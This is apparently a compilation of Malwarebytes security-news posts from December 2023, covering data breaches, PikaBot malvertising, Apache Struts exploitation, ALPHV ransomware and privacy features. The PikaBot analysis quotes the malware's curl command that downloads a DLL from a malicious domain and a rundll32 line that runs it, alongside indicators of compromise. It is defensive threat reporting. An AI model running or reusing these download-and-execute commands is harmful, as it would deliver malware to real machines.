Loan and mortgage giant Mr. Cooper reported a data breach in which the personal data of 14.7 million homeowners were stolen.

A major mortgage and loan company based in Dallas, working under the name Mr. Cooper Group Inc. has released more information on a recent breach. In a data breach notification, the company didn’t say what type of cyberattack caused the compromise of customer data, calling it a rather non-descriptive “External system breach (hacking).”

For those unfamiliar with the name, Mr. Cooper is a rebranding of Nationstar Mortgage, and reportedly some 14.7 million homeowners may be affected by the data breach.

A month ago, in November 2023, the company stated that the number of affected customers was limited to around 4 million, because banking information related to mortgage payments is hosted with a third-party provider, whose systems were believed not to be compromised.

As it turns out, all current and former customers, amounting to over 14 million people had their personal data stolen. Mr. Cooper shut down multiple systems after it discovered the cyberattack on October 31, 2023 and started its investigation.

The data accessible during the attack included the names, addresses, phone numbers, Social Security numbers, dates of birth, and bank account numbers of Mr. Cooper’s customers.

One the page dedicated to the incident, Mr. Cooper states:

> “To help support our customers, we are offering two years of free credit monitoring and identity protection services through TransUnion to any former or current (as of Oct. 31, 2023) Mr. Cooper customer or customers whose loans we service on behalf of our servicing partners. We will be directly notifying customers and providing them with enrollment instructions for the free identity protection services.”

Mr. Cooper says it is actively monitoring the dark web without any evidence that the data related to this incident has been further shared, published, or otherwise misused. This may however change if it turns out that any ransomware demands are made and not met. At some points the data thieves may want to cash in for the stolen data.

**Data breach**

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

*   Check the vendor’s advice. Every breach is different, so check with the vendor to find out what’s happened, and follow any specific advice they offer.
*   Change your password. You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
*   Enable two-factor authentication. Where possible, use a FIDO2 2FA device. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
*   Watch out for fake vendors. The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify any contacts using a different communication channel.
*   Take your time. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
*   Consider investing in an identity monitoring solution which will alert you if your personal information is found being illegally traded online, as well as help you recover.

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using Malwarebytes Identity Theft Protection.

 Mr. Cooper leaks personal data of 14 million loan and mortgage customers 

This week on the Lock and Code podcast, we speak with EFF public interest technology Cooper Quintin about the hacking tool, the Flipper Zero.

_This week on the Lock and Code podcast…_

It talks, it squawks, it even blocks! The stocking-stuffer on every hobby hacker’s wish list this year is the Flipper Zero.

“Talk” across low-frequency radio to surreptitiously change TV channels, emulate garage door openers, or even pop open your friend’s Tesla charging port without their knowing! “Squawk” with the Flipper Zero’s mascot and user-interface tour guide, a “cyber-dolphin” who can “read” the minds of office key fobs and insecure hotel entry cards. And, introducing in 2023, block iPhones running iOS 17!

No, really, for a couple of months near the end of 2023, this consumer-friendly device could crash iPhones (a vulnerability that Apple fixed in a software update in mid-December), and in the United States, it is entirely legal to own.

But for security researcher Jeroen van der Ham, the Flipper Zero also served as a real pain in the butt one day in October, when, aboard a train in the Netherlands, he got a popup on his iPhone about a supposed Bluetooth pairing request with a nearby Apple TV. Strange as that may be on a train, van der Ham soon got another request. And then another, and another, and another.

In explaining the problem to the outlet Ars Technica, van der Ham wrote:

> “My phone was getting these popups every few minutes and then my phone would reboot. I tried putting it in lock down mode, but it didn’t help.”

Later that same day, on his way back home, once again aboard the train, van der Ham noticed something odd: the iPhone popups came back, and this time, he noticed that his fellow passengers were also getting hit.

What van der Ham soon learned is that he—and the other passengers on the train—were being subjected to a Denial-of-Service attack, which weaponized the way that iPhones receive Bluetooth pairing requests. A Denial-of-Service attack is simple. Essentially, a hacker, or more commonly, an army of bots, will flood a device or a website with requests. The target in these attacks cannot keep up with the requests, so it often locks up and becomes inaccessible. That can be a major issue for a company that is suffering from having its website attacked, but it’s also dangerous for everyday people who may need to use their phones to, say, document something important, or reach out to someone when in need.

In van der Ham’s case, the Denial-of-Service attack was likely coming from one passenger on the train, who was aided by the small, handheld device, the Flipper Zero.

Today, on the Lock and Code podcast, with host David Ruiz, we speak with Cooper Quintin, senior public interest technologist with Electronic Frontier Foundation—and Flipper Zero owner—about what the Flipper Zero can do, what it can’t do, and whether governments should get involved in the regulation of the device (that’s a hard “No,” Quintin said).

“Governments should be welcoming this device,” Quintin said. “Every government right now is saying, ‘We need more cyber security capacity. We need more cyber security researchers. We got cyber wars to fight, blah, blah, blah,’ right?”

Quintin continued:

> “Then, when you make this amazing tool that is, I think, a really great way for people to start interacting with cybersecurity and getting really interested in it—then you ban that?”

Tune in today to listen to the full conversation.

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use.

_Show notes and credits:_

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)  
Licensed under Creative Commons: By Attribution 4.0 License  
http://creativecommons.org/licenses/by/4.0/  
Outro Music: “Good God” by Wowa (unminus.com)

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

 Meet the entirely legal, iPhone-crashing device, the Flipper Zero: Lock and Code S04E25 

MongoDB has warned customers about a data breach that leaked information about their customers. The incident is under investigation.

Database provider MongoDB has posted a security notice about a security incident in which attackers obtained unauthorized access to some of its corporate systems. The targeted system contained customer names, phone numbers, and email addresses among other customer account metadata, including system logs for one customer.

That customer has been notified separately and there is no evidence that any other customers’ system logs were accessed. MongoDB said there is no evidence of unauthorized access to Atlas clusters since that would require compromise of the separate Atlas cluster authentication system.

On Wednesday December 13, 2023, MongoDB’s staff detected suspicious activity and began an investigation. The investigation is ongoing, but it appears that the unauthorized access was going on for “some period of time” before discovery.

In emails sent to MongoDB customers, MongoDB advises users to be alert about phishing and social engineering attacks that might use the leaked customer metadata to gain credibility.

Scammers often try to take advantage of data breaches. They know that the breached company is likely to be contacting victims, and that the victims will be looking out for emails from the company. It’s easy to spoof an email to make it look like it comes from somewhere else, and then send someone malware or a link to a phishing site.

Users are also advised to rotate database passwords and enable multi-factor authentication (MFA).

If you suspect you might be affected by this data breach, you may want to keep an eye on the alert page with additional information as MongoDB continues to investigate the matter. And if there is anything important, we will update this article.

Our business solutions remove all remnants of ransomware and prevent you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

 MongoDB warns customers about data breach after cyberattack 

A list of topics we covered in the week of December 11 to December 17 of 2023

December 15, 2023 - PikaBot, a stealthy malware normally distributed via malspam is now being spread via malicious ads.

December 15, 2023 - Google will soon roll out its Tracking Protection feature to some randomly chosen users in order to prepare for a full deployment.

December 14, 2023 - Apple has plans to make it harder for iPhone thieves to steal your personal information even if they have your device’s passcode.

December 14, 2023 - A recently patched Apache Struts 2 vulnerability has been spotted in worldwide exploitation attempts. Users and admins should update ASAP.

December 14, 2023 - The ALPHV ransomware group appears to be going through some things.

 A week in security (December 11 &#8211; December 17) 

PikaBot, a stealthy malware normally distributed via malspam is now being spread via malicious ads.

During this past year, we have seen an increase in the use of malicious ads (malvertising) and specifically those via search engines, to drop malware targeting businesses. In fact, browser-based attacks overall have been a lot more common if we include social engineering campaigns.

Criminals have found success in acquiring new victims thanks to search ads; we believe there are specialized services that help malware distributors and affiliates to bypass Google’s security measures and helping them to set up a decoy infrastructure. In particular, we saw similarities with the malvertising chains previously used to drop FakeBat.

In the past few days, researchers including ourselves have observed PikaBot, a new malware family that appeared in early 2003, distributed via malvertising. PikaBot was previously only distributed via malspam campaigns similarly to QakBot and emerged as one of the preferred payloads for a threat actor known as TA577.

In this blog post, we share details about this new campaign along with indicators of compromise.

**PikaBot via malspam**

PikaBot was first identified as a possible Matanbuchus drop from a malspam campaign by Unit 42 in February 2023. The name PikaBot was later given and attributed to TA577, a threat actor that Proofpoint saw involved in the distribution of payloads such as QakBot, IcedID, SystemBC as well as Cobalt Strike. More importantly, TA577 has been associated with ransomware distribution.

Researchers at Cofense observed a rise in malspam campaigns to deliver both DarkGate and PikaBot, following the takedown of the QakBot botnet in August 2023. A typical distribution chain for PikaBot usually starts with an email (hijacked thread) containing a link to an external website. Users are tricked to download a zip archive containing a malicious JavaScript.

The JavaScript creates a random directory structure where it retrieves the malicious payload from an external website via the _curl_ utility:

"C:\\Windows\\System32\\cmd.exe" /c mkdir C:\\Gkooegsglitrg\\Dkrogirbksri & curl https://keebling\[.\]com/Y0j85XT/0.03471530983348692.dat --output C:\\Gkooegsglitrg\\Dkrogirbksri\\Wkkfgujbsrbuj.dll

curl https://keebling\[.\]com/Y0j85XT/0.03471530983348692.dat --output C:\\Gkooegsglitrg\\Dkrogirbksri\\Wkkfgujbsrbuj.dll

It then executes the paylod (DLL) via _rundll32_:

rundll32 C:\\Gkooegsglitrg\\Dkrogirbksri\\Wkkfgujbsrbuj.dll,Enter

As described by OALabs, PikaBot’s core module is then injected into the legitimate _SearchProtocolHost.exe_ process. PikaBot’s loader also hides its injection by using indirect syscalls, making the malware very stealthy.

**Distribution via malvertising**

The campaign targets Google searches for the remote application AnyDesk. Security researcher Colin Cowie observed the distribution chain and the payload was later confirmed to be PikaBot by Ole Villadsen.

We also saw this campaign via a different ad impersonating the AnyDesk brand, belonging to the fake persona “Manca Marina”:

A decoy website has been setup at _anadesky\[.\]ovmv\[.\]net_:

The download is a digitally signed MSI installer. It’s worth noting that it had zero detection on VirusTotal at the time we collected it. However, the more interesting aspect is how it evades detection upon execution.

The diagram below from JoeSandbox summarizes the execution flow:

**Malvertising similarities with FakeBat**

The threat actors are bypassing Google’s security checks with a tracking URL via a legitimate marketing platform to redirect to their custom domain behind Cloudflare. At this point, only clean IP addresses are forwarded to the next step.

They perform fingerprinting via JavaScript to determine, among other things, if the user is running a virtual machine. Only after the check is successful do we see a redirect to the main landing page (decoy AnyDesk site).

What’s interesting is that there is a second fingerprinting attempt when the user clicks the download button. This is likely to ensure that the download link won’t work in a virtualized environment. In this particular campaign, the threat actor is hosting the MSI installer on Dropbox.

We noticed that previous malvertising chains used the same redirection mechanism via onelink\[.\]me as well as URL structure. These incidents were previously reported to Google and targeted Zoom and Slack search ads:

In some of these instances, we had identified the payload as FakeBat. This is particularly interesting because it points towards a common process used by different threat actors. Perhaps, this is something akin to “malvertising as a service” where Google ads and decoy pages are provided to malware distributors.

**Conclusion**

Several years ago, exploit kits were the primary malware distribution vector via drive-by downloads. As vulnerabilities in the browser and its plugins began to be less effective, threat actors concentrated on spam to target businesses. However, some did continue to target browsers but instead had to rely on social engineering, luring victims with fake browser updates.

With malvertising, we see another powerful delivery vector that does not require the user to visit a compromised site. Instead, threat actors are piggybacking on search engines and simply buyings ads that they know their target will be exposed to. As we may have said before, businesses can prevent this risk by only allowing their end users to install applications via their own trusted repositories.

Malwarebytes detects the malicious MSI installers as well as the web infrastructure used in these malvertising campaigns. We have reported the malicious ads and download URLs to Google and Dropbox respectively.

_Special thanks to Sergei Frankoff, Ole Villadsen, and pr0xylife for their help and feedback._

**Indicators of Compromise**

**Malicious domains**

anadesky\[.\]ovmv\[.\]net
cxtensones\[.\]top

**Dropbox payloads**

dropbox\[.\]com/scl/fi/3o9baztz08bdw6yts8sft/Installer.msi?dl=1&rlkey=wpbj6u5u6tja92y1t157z4cpq  
dropbox\[.\]com/scl/fi/p8iup71lu1tiwsyxr909l/Installer.msi?dl=1&rlkey=h07ehkq617rxphb3asmd91xtu  
dropbox\[.\]com/scl/fi/tzq52v1t9lyqq1nys3evj/InstallerKS.msi?dl=1&rlkey=qbtes3fd3v3vtlzuz8ql9t3qj

**PikaBot hashes**

0e81a36141d196401c46f6ce293a370e8f21c5e074db5442ff2ba6f223c435f5  
da81259f341b83842bf52325a22db28af0bc752e703a93f1027fa8d38d3495ff  
69281eea10f5bfcfd8bc0481f0da9e648d1bd4d519fe57da82f2a9a452d60320

**PikaBot C2s**

172\[.\]232\[.\]186\[.\]251  
57\[.\]128\[.\]83\[.\]129  
57\[.\]128\[.\]164\[.\]11  
57\[.\]128\[.\]108\[.\]132  
139\[.\]99\[.\]222\[.\]29  
172\[.\]232\[.\]164\[.\]77  
54\[.\]37\[.\]79\[.\]82  
172\[.\]232\[.\]162\[.\]198  
57\[.\]128\[.\]109\[.\]221

 PikaBot distributed via malicious search ads 

Google will soon roll out its Tracking Protection feature to some randomly chosen users in order to prepare for a full deployment.

Google has announced that it will start rolling its Chrome web browser’s new Tracking Protection feature from January of 2024. Tracking Protection is part of Google’s Privacy Sandbox initiative to phase out third-party cookies. The Tracking Protection feature aims to disable third-party cookies completely in the second half of 2024.

Third-party cookies, often referred to as non-essential cookies, can be used to track visitors as they move from one website to another, with the purpose of creating profiles for personalized ads. But other website features, like authentication and fraud prevention can also depend on them.  

Starting January 4, Google says it will select one percent of Chrome users on desktop and Android at random, and that group will get the option to use the Tracking Protection feature. The chosen users will receive a notification about it when they open Chrome.

The selected Chrome users can do some testing to establish the impact of blocking third-party cookies on their browsing experience. For example, when Tracking Protection is enabled, some websites may not load correctly, so users will also have the option to temporarily re-enable third-party cookies for that specific website.

One significant difference with the existing (largely useless) “Do Not Track” feature is that websites do not have a choice about whether to cooperate with Tracking Protection. Do Not Track is a signal sent by the browser that asks websites to play nicely and not track it. It isn’t effective and there is no way to determine if it’s having the desired effect or not.

Other initiatives by Google in this direction include hiding your IP address. An IP address is the next best thing for tracking users across the internet. Although the IP address is often not limited to one system, they are very often bound to one household. Google’s IP Protection proposal wants to use proxies to hide users’ IP addresses.

It remains to be seen how fruitful these initiatives will be. A few years ago (March 2021), Google ran some tests with a program called Federated Learning of Cohorts (FLoC) which was also intended to replace third-party cookies. But the technology was criticized on privacy grounds and on January 25, 2022, Google officially announced it had ended development of FLoC technologies.

FLoC was replaced by the Topics API, another Privacy Sandbox mechanism designed to preserve privacy while allowing a browser to share information with third parties about a user’s interests.

Meanwhile, regulators are monitoring the tech giant’s initiatives to ensure they don’t give the company an unfair advantage in selling its own ads.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

 Chrome starts the countdown to the end of tracking cookies 

Apple has plans to make it harder for iPhone thieves to steal your personal information even if they have your device’s passcode.

Reportedly, Apple has plans to make it harder for iPhone thieves to steal your personal information even if they have your device’s passcode.

A new feature called Stolen Device Protection is included in the bet version of iOS 17.3. The feature limits access to your private information in case someone gets hold of both your iPhone and your passcode.

Thieves sometimes lurk in public places like bars on the lookout for iPhone owners typing in their passcode. Once they know the passcode, they steal the device and gain access.

With the passcode, a thief can perform a lot of actions that have financial consequences and some that make it harder to retrieve the device:

*   View and use passwords or passkeys saved in the iCloud Keychain
*   Apply for a new Apple Card
*   Turn off Lost Mode
*   Erase all content and settings
*   Take certain Apple Cash and Savings actions in Wallet
*   Use payment methods saved in Safari
*   Use your iPhone to set up a new device
*   Change your Apple ID password
*   Update select Apple ID account security settings, including adding or removing a trusted device, trusted phone number, Recovery Key, or Recovery Contact
*   Change your iPhone passcode
*   Add or remove Face ID or Touch ID
*   Turn off “Find My”

However, when users turn on Stolen Device Protection, Face ID or Touch ID authentication is required for all of the above actions and also to turn off Stolen Device Protection.

Apple said it will share additional information about Stolen Device Protection soon, to clarify how the feature works.

**We don’t just report on iOS security—we provide it**

Cybersecurity risks should never spread beyond a headline. Keep threats off your iOS devices by downloading Malwarebytes for iOS today.

 Apple to introduce new feature that makes life harder for iPhone thieves 

A recently patched Apache Struts 2 vulnerability has been spotted in worldwide exploitation attempts. Users and admins should update ASAP.

Attackers are exploiting a critical vulnerability in Apache Struts 2 that was patched recently. Struts is a very popular open source platform to develop applications and websites.

On December 7, 2023, Apache announced versions 6.3.0.2 and 2.5.33 of Struts were now available to address a potential security vulnerability listed as CVE-2023-50164.

The vulnerability affects Apache Struts versions:

*   2.0.0 through 2.5.32
*   6.0.0 through 6.3.0.1
*   2.0.0 through 2.3.37 (EOL, no longer supported)

The vulnerability that has a CVSS score of 9.8 out of 10, lies in the frameworks’ file upload functionality and can be exploited to achieve remote code execution (RCE). There is an easy to follow proof-of-concept (PoC) available, which makes it easier for cybercriminals to exploit the vulnerability.

Basically it’s a path traversal flaw that allow attackers to read, and possibly write to, restricted files by inputting path traversal sequences like ../ into file or directory paths. The flaw is caused by parameter confusion, where an attacker can first capitalize a parameter in the request and then submit an additional parameter (in lowercase) that overrides an internal file name variable. That allows an attacker to bypass the built-in check and leave the path traversal payload in the final filename.

This allows a successful attacker to plant a web shell, a malicious script used by an attacker that allows them to escalate and maintain persistent access. In this case, the attacker gets the ability to write a server-side rendered file, such as a JSP (Jakarta Server Pages) file, into a target directory. The JSP payload is executed as soon as the attacker requests the file from the server and the server is compromised. Several international organizations like the Australian Cyber Security Centre (ACSC), the French Computer Emergency Response Team (CERT-FR), and content delivery giant Akamai are warning that they are seeing active exploitation.

_Tweet by Akamai_

Because of the relative ease-of-use, we can expect to see a lot more of these attacks.

**Update now**

Users and administrators are encouraged to review the Apache Security Bulletin and upgrade to Struts 2.5.33 or Struts 6.3.0.2 or greater. There are no workarounds.

According to Apache this is a drop-in replacement and upgrade should be straightforward. The new versions can be found on the Struts download page.

Besides updating, additional measures may include:

*   Sanitization checks on uploaded file data.
*   Limit server application permissions to allowed directories.
*   Track which applications in use within your environments are using Struts frameworks.
*   On internet facing Java systems monitor for newly created files outside directories where they are expected.
*   Continue to monitor the situation and respond to new information as it comes to light.

**We don’t just report on vulnerabilities—we identify them, and prioritize action.**

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using ThreatDown Vulnerability and Patch Management.

 Recently-patched Apache Struts vulnerability used in worldwide attacks 

The ALPHV ransomware group appears to be going through some things.

The ALPHV ransomware gang, arguably the second most dangerous “big game” ransomware operator, appears to be back in business after its infrastructure went down for five days. But all does not appear to be going well for group.

ALPHV’s dark web leak site may be back but it is only showing a single victim with no sign of any of the hundreds of others it normally lists. The solitary listing on the site is dated December 13, which is after the site was restored.

Many of the group’s negotiation links are reportedly not working either, meaning that victims looking to pay off the gang are stuck in limbo, and its likely that neither the ALPHV group, nor the affiliates who use its ransomware to carry out attacks, are being paid.

The ALPHV leak site currently lists a single victimcreenshot

When the gang’s infrastructure went down a week ago, many suspected the hand of law enforcement, despite no official word on the subject. According to VX Underground, APLHV’s own explanation is that it suffered a hardware failure. If the group really has lost access to the data its business relies on, then it’s now getting a first hand look at what its victims go through when they’re attacked and their data is encrypted.

ALPHV wouldn’t be the first ransomware gang to suffer problems behind the scenes. Earlier this year, Analyst1 reported that LockBit, the 800-lb gorilla in the ransomware space “cannot consistently publish stolen data … due to limitations in its backend infrastructure and available bandwidth.”

However, while it’s perfectly plausible that ALPHV is suffering hardware woes, law enforcement action can’t be ruled out. ALPHV would likely lose affiliates if it admitted to a brush with the law, so the ransomware gang is likely going to attribute the outage to something benign—whether that is true or not. Equally, the silence from the FBI could mean everything and nothing. In January, the agency took down one of ALPHV’s contemporaries, Hive, and revealed it had penetrated the group’s infrastructure six months prior:

> Since late July 2022, the FBI has penetrated Hive’s computer networks, captured its decryption keys, and offered them to victims worldwide, preventing victims from having to pay $130 million in ransom demanded. Since infiltrating Hive’s network in July 2022, the FBI has provided over 300 decryption keys to Hive victims who were under attack. In addition, the FBI distributed over 1,000 additional decryption keys to previous Hive victims.

There were infiltration rumors about LockBit later in the year too, after it went inexplicably dark for two weeks. Analyst1’s undercover investigator revealed they had “received another message from a third party who indicated they may have hacked the gang’s infrastructure … I believe the gang went dark to clean up the intrusion into its infrastructure.”

Analyst1 didn’t say whether the third party that claimed to have hacked LockBit was a law enforcement agency, a criminal hacker, or another ransomware gang, but all are possible—there is no honor among thieves.

ALPHV would certainly be of great interest to both law enforcement and its rivals. Over the last 18 months it has been the second most dangerous ransomware group in the world, listing more victims on its leak site than every other group apart from LockBit.

The five most active ransomware groups by known attacks over the last 18 months.

The number of known monthly attacks by the group has increased steadily over the last 18 months, too.

Known ransomware attacks per month by ALPHV

Even if another ransomware gang isn’t behind ALPHV’s woes, one of them is certainly looking to profit from it.

Bleeping Computer reports that LockBit has been attempting to recruit affiliates from ALPHV. The gang is reportedly offering the use of its data leak site and negotiation panel to ALPHV affiliates so they can resume negotiations with victims that have been disrupted. At least one victim previously listed on the ALPHV site is now listed on the LockBit site.

Whether ALPHV’s troubles are caused by tight-lipped law enforcement, an ironic lack of disaster recovery planning, or some other sleight of hand, any disruption to the ransomware ecosystem is a welcome early Christmas present in our book.

**How to avoid ransomware**

*   **Block common forms of entry.** Create a plan for patching vulnerabilities in internet-facing systems quickly; and disable or harden remote access like RDP and VPNs.
*   **Prevent intrusions.** Stop threats early before they can even infiltrate or infect your endpoints. Use endpoint security software that can prevent exploits and malware used to deliver ransomware.
*   **Detect intrusions.** Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
*   **Stop malicious encryption.** Deploy Endpoint Detection and Response software like ThreatDown EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
*   **Create offsite, offline backups.** Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
*   **Don’t get attacked twice.** Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Our business solutions remove all remnants of ransomware and prevent you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

 ALPHV ransomware gang returns, sorta 

Apple has changed its legal process guidelines to reflect it now requires a judge's order to hand over information about its customers' push notifications.

Last week, we reported on how US government agencies have been asking Apple and Google for metadata related to push notifications, but the companies aren’t allowed to tell users about it happening.

The content of the notifications is diverse. It ranges from a weather app warning you about rain to an alert that you have new mail, which often included the subject line and the sender. Other notifications include alerts from your bank about major changes in your balance, breaking news from your news app, or DM notifications on a social media platform.

Not all of them are equally important or sensitive, but Apple and Google acknowledged receiving such requests. Now Apple is making a stand.

Apple’s now changed its legal process guidelines so that it now requires a judge’s order to hand over information about its customers’ push notifications to law enforcement.

> “When users allow an application they have installed to receive push notifications, an Apple Push Notification Service (APNs) token is generated and registered to that developer and device. Some apps may have multiple APNs tokens for one account on one device to differentiate between messages and multi-media.
> 
> The Apple ID associated with a registered APNs token and associated records may be obtained with an order under 18 U.S.C. §2703(d) (Required disclosure of customer communications or records) or a search warrant.”

Senator Wyden, who last week urged the Department of Justice (DOJ) to “permit Apple and Google to inform their customers and the general public about demands for smartphone app notification records,” said on the latest developments:

> “Apple is doing the right thing by matching Google and requiring a court order to hand over push notification related data.”

**Disabling notifications**

If you want to trim the number of notifications, here is what you can do.

On Android devices open your **Settings** app and click on **Notifications**. In the dropdown menu, tap **All apps**. Here you can turn the app’s notifications on or off. There could be slight variations due to Android version and phone vendors. (The path may be slightly dfferent depending on the make and model of your Android device).

On iPhones and iPads open the **Settings** app and click on **Notifications**. You’ll see a list of apps that are allowed to show push notifications. To disable them, you need to click on the individual app in that list and disable notifications (turn the slider from green to grey).

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Source

Malwarebytes